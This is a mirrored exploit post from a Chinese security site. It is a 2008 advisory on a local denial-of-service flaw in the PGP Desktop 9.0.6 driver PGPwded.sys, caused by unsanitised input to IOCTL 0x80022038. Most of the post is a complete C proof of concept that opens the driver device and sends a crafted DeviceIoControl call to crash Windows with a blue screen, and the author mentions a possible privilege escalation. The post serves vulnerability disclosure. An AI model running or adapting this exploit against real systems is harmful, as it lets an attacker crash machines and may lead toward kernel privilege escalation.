首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PGP Desktop 9.0.6 (PGPwded.sys) Local Denial of Service Exploit
来源:http://evilfingers.com/ 作者:evilcry 发布时间:2008-12-24  

--------------------------[PGP Desktop 9.0.6 Denial Of Service]--------------->


Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Profile: http://evilcry.netsons.org
Website: http://evilfingers.com/

Release Date: 23/12/2008

+-------------------------------------------------+
Product: PGP Desktop 9.0.6 [Build 6060] (other version could be affected)
Affected Component: PGPwded.sys
Category: Local Denial of Service (BSOD)
          (untested) Local Privilege Escalation
+-------------------------------------------------+

 

--------------------------[Details]--------------->

PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL)
and this lead to a Driver Collapse that propagates on the system with a BSOD.

Affected IOCTL is 0x80022038

+-------------------------------------------------+
 Device Type: Custom Device Type: 0x8002, 32770
 Transfer Type: METHOD_BUFFERED (0x0, 0)
 Access Type: FILE_ANY_ACCESS (0x0, 0)
 Function Code: 0x80E, 2062
+-------------------------------------------------+

From Crash Dump Analysis we obtain a KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e),
could also exists the possibility of a Local Privilege Escalation, but I've not
checked it =)

+--------------------------------------------------------------------------------------------+
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 *
 */

/*
Since we had publishing problems, we used spaces between escape < char and the include file as shown here: #include < windows.h >, to compile you have to delete the space.

*/
#include < windows.h >
#include < stdio.h >
#include < stdlib.h >

int main(void)
{
 HANDLE hDevice; 
 DWORD Dummy; 
 
 system("cls");
 printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");

 hDevice = CreateFileA("\\\\.\\PGPwdef",
      0,
      FILE_SHARE_READ | FILE_SHARE_WRITE,
      NULL,
      OPEN_EXISTING,
      0,
      NULL);

 if (hDevice == INVALID_HANDLE_VALUE)
 {
  printf("\n Unable to Open PGPwded Device Driver\n");
  return EXIT_FAILURE;
 }

 DeviceIoControl(hDevice, 0x80022038,(LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Dummy, (LPOVERLAPPED)NULL);

 return EXIT_SUCCESS;
}

+--------------------------------------------------------------------------------------------+

 

Special Thanks:
To _g_ of orange-bat that developed IOCTL-Proxy a really effective IOCTL Fuzzer
http://www.orange-bat.com/code/ioctl-proxy.zip

 

Regards,
Giuseppe 'Evilcry' Bonfa'

 

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based
on currently available information. Use of the information constitutes acceptance for use
in an AS IS condition. There is no representation or warranties, either express or implied
by or with respect to anything in this document, and shall not be liable for a ny implied
warranties of merchantability or fitness for a particular purpose or for any indirect special
or consequential damages.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Psi Jabber Client (8010/tcp) R
·CMS NetCat 3.12 (password_reco
·Mozilla Firefox 3.0.5 location
·RoundCube Webmail <= 0.2b Remo
·CUPS < 1.3.8-4 (pstopdf filter
·CMS NetCat 3.12 (password_reco
·Getleft 1.2 Remote Buffer Over
·Google Chrome Browser (ChromeH
·SolarCMS 0.53.8 (Forum) Remote
·FreeSSHD 1.2.1 (Post Auth) Rem
·CoolPlayer 2.19 (Skin File) Lo
·Exploits FreeSSHd Multiple Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved